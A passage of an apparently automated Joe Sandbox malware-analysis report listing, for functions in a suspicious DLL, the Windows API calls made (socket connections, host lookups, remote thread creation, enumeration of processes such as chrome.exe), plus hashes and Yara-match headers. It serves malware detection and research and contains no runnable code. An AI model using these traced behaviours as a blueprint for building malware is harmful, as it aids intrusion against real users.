                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                                  • String ID:
                                                  • API String ID: 136543108-0
                                                  • Opcode ID: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                  • Instruction ID: af8d02120cf7308e6d709f2e7e2ecce89aa86b165303e1ddd931105c7dc64684
                                                  • Opcode Fuzzy Hash: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                  • Instruction Fuzzy Hash: B811BF79008B41DFD324DF28C844B9AB7E8EF85620F044B1CF0AA432D1DBB864098B63
                                                  APIs
                                                  • #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                  • #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                  • #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                  • #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #535#537#800#940
                                                  • String ID:
                                                  • API String ID: 1382806170-0
                                                  • Opcode ID: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                  • Instruction ID: 1b94c52f3496be9ecc741279a921140b636ff9e4308d57c3df3fe77fcebb6b55
                                                  • Opcode Fuzzy Hash: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                  • Instruction Fuzzy Hash: E2018B7550C7429FD304DF18C850B9BBBE1EB95764F408A0DF895872A2DB74E84A8B92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #536#537#800#922
                                                  • String ID:
                                                  • API String ID: 1475696894-0
                                                  • Opcode ID: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                  • Instruction ID: 1cf16686c75a57ace72aecc56e9772a672cb7b67628aacae2db0a16f8193c9c6
                                                  • Opcode Fuzzy Hash: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                  • Instruction Fuzzy Hash: 2301B5B6204650AFC304DF58DD01F9AF7E4FB88B14F408A2DF98997781C779A904CB92
                                                  APIs
                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 1002CB6A
                                                  • htons.WS2_32 ref: 1002CB92
                                                  • connect.WS2_32(00000000,?,00000010), ref: 1002CBA5
                                                  • closesocket.WS2_32(00000000), ref: 1002CBB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: closesocketconnecthtonssocket
                                                  • String ID:
                                                  • API String ID: 3817148366-0
                                                  • Opcode ID: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                  • Instruction ID: e8f6fcb377fdd042e502e5b9bb1bca880f3579ad8180536aff2f54e253c3389a
                                                  • Opcode Fuzzy Hash: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                  • Instruction Fuzzy Hash: E0F0F6385143306BE700EB7C9C8AADBB7E4FF84324F844B49F9A8822E1E27084045786
                                                  APIs
                                                  • WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?), ref: 1002C33C
                                                  • #823.MFC42(00000100,75571760,00000000,000000FF,00000005,?,?), ref: 1002C34B
                                                  • lstrcpyA.KERNEL32(00000000,?,?), ref: 1002C35B
                                                  • WTSFreeMemory.WTSAPI32(?), ref: 1002C366
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823FreeInformationMemoryQuerySessionlstrcpy
                                                  • String ID:
                                                  • API String ID: 3008764780-0
                                                  • Opcode ID: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                  • Instruction ID: 0e0dc6ce2e22f62c944f194f199933a30fb1a1041a33420a8a3a97c55cf99f31
                                                  • Opcode Fuzzy Hash: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                  • Instruction Fuzzy Hash: F9F0A7B96083116BDB00DB78AC46D9B76E4EB84A11F444A2CF948D2280F574ED08C7F2
                                                  APIs
                                                  • Process32First.KERNEL32(?,00000128), ref: 1000B5B7
                                                  • Process32Next.KERNEL32(?,00000128), ref: 1000B5D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$FirstNext
                                                  • String ID: ???
                                                  • API String ID: 1173892470-1053719742
                                                  • Opcode ID: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                  • Instruction ID: f3f52207799e89cd2a562506939f2cbbbb926e58e4282d7ba594e292c06b3d7f
                                                  • Opcode Fuzzy Hash: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                  • Instruction Fuzzy Hash: CE010432205A040BD728D9399C419AFB7D6EFC43A0F91462DF826C32C4DF78DE08C691
                                                  APIs
                                                  • #537.MFC42(chrome.exe), ref: 1000D897
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • Sleep.KERNEL32(000003E8), ref: 1000D8A9
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                    • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                    • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                    • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                  • String ID: chrome.exe
                                                  • API String ID: 294463573-2619149582
                                                  • Opcode ID: 8a2962456d4226b2b37f09fce1ff47a6c87198594a43253825bd3ca5275863b7
                                                  • Instruction ID: 937db72c451f7d7298a7d72ee82d98ab827ef43f1333ab97fdd24501930b49d6
                                                  • Opcode Fuzzy Hash: 8a2962456d4226b2b37f09fce1ff47a6c87198594a43253825bd3ca5275863b7
                                                  • Instruction Fuzzy Hash: 4E117FB80086C19FE324DB64D951BDFB7E0EB95750F404A2DE8A9432C1DF342604CBA3
                                                  APIs
                                                  • #537.MFC42(chrome.exe), ref: 1000D997
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • Sleep.KERNEL32(000003E8), ref: 1000D9A9
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                    • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                    • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                    • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                  • String ID: chrome.exe
                                                  • API String ID: 294463573-2619149582
                                                  • Opcode ID: 1a36ca56097d4157cbc565df20af2378335b0440f818cd579cbdade357011e65
                                                  • Instruction ID: 7d00cbbaefd424bab256b053e7334cbca6cae7e0cf794a66506b1b3d32c14fa1
                                                  • Opcode Fuzzy Hash: 1a36ca56097d4157cbc565df20af2378335b0440f818cd579cbdade357011e65
                                                  • Instruction Fuzzy Hash: EE117F781086C09BE324DB64DA51BDFB7E0EB95750F404A2DE8A9432C1DF382504CBA3
                                                  APIs
                                                    • Part of subcall function 1002CDD0: Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                    • Part of subcall function 1002CDD0: wsprintfA.USER32 ref: 1002CE0C
                                                    • Part of subcall function 1002CDD0: closesocket.WS2_32(00000000), ref: 1002CE24
                                                    • Part of subcall function 1002CDD0: TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                    • Part of subcall function 1002CDD0: CloseHandle.KERNEL32(1012E1C4), ref: 1002CE63
                                                  • gethostbyname.WS2_32(1012B918), ref: 10024678
                                                  • inet_ntoa.WS2_32(?), ref: 1002469B
                                                    • Part of subcall function 1002CC90: _snprintf.MSVCRT ref: 1002CCCF
                                                    • Part of subcall function 1002CC90: recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                    • Part of subcall function 1002CC90: CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                    • Part of subcall function 1002CC90: CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                    • Part of subcall function 1002CC90: closesocket.WS2_32(00000000), ref: 1002CDB1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleThreadclosesocket$CreateSleepTerminate_snprintfgethostbynameinet_ntoarecvwsprintf
                                                  • String ID: 127.0.0.1
                                                  • API String ID: 4129115345-3619153832
                                                  • Opcode ID: c64b287c9701a872d1ce02b35808dddf6b5cfb117866dcaa8d1298daaccfc035
                                                  • Instruction ID: dfc37fb64dee02c743c361079aff155d5755dd21fe0fbfcf436a641e6dd946ac
                                                  • Opcode Fuzzy Hash: c64b287c9701a872d1ce02b35808dddf6b5cfb117866dcaa8d1298daaccfc035
                                                  • Instruction Fuzzy Hash: A7E06D7A2106009BC204DBA8EC80DEB77E5FBDC710B04852DF94AD7211C6307841D7A0
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001C8E
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001CA4
                                                  • memmove.MSVCRT(?,?,00000000,?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000), ref: 10001CF5
                                                  • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001D1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$Leave$Entermemmove
                                                  • String ID:
                                                  • API String ID: 72348100-0
                                                  • Opcode ID: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                  • Instruction ID: 50b30369da4871338d3e5076dbae6429fca2f6132d25b88ab6d76ff2db9ab769
                                                  • Opcode Fuzzy Hash: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                  • Instruction Fuzzy Hash: AE11BF3A3042154FAB08EF749C858EFB799FF94290704452EF907CB346DB71ED0886A0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
Yara matches
Similarity
• API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
• String ID:
• API String ID: 3289936468-0
• Opcode ID: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
• Instruction ID: e5bcf6fcaf6474cf11c06b2f5d739369e89de0018cd217908e7742b1c919ccc1
• Opcode Fuzzy Hash: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
• Instruction Fuzzy Hash: DB0180B5C04665AFE711DF188C44BEABFE8FB0AAA0F040656E995A3645C7345E028BE1
APIs
• GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
• HeapReAlloc.KERNEL32(00000000), ref: 100069C7
• GetProcessHeap.KERNEL32(00000000,?), ref: 100069D5
• HeapAlloc.KERNEL32(00000000), ref: 100069DC
Memory Dump Source
• Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
Yara matches
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
• Instruction ID: 47877cb6062bd81062e19e0104322f8483190e017e00c23344b6b727d1ead73d
• Opcode Fuzzy Hash: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
• Instruction Fuzzy Hash: B6D04C75604212ABFE449BA8CD8DFAA7BADFB84745F058948F54DCA094C6709840DB31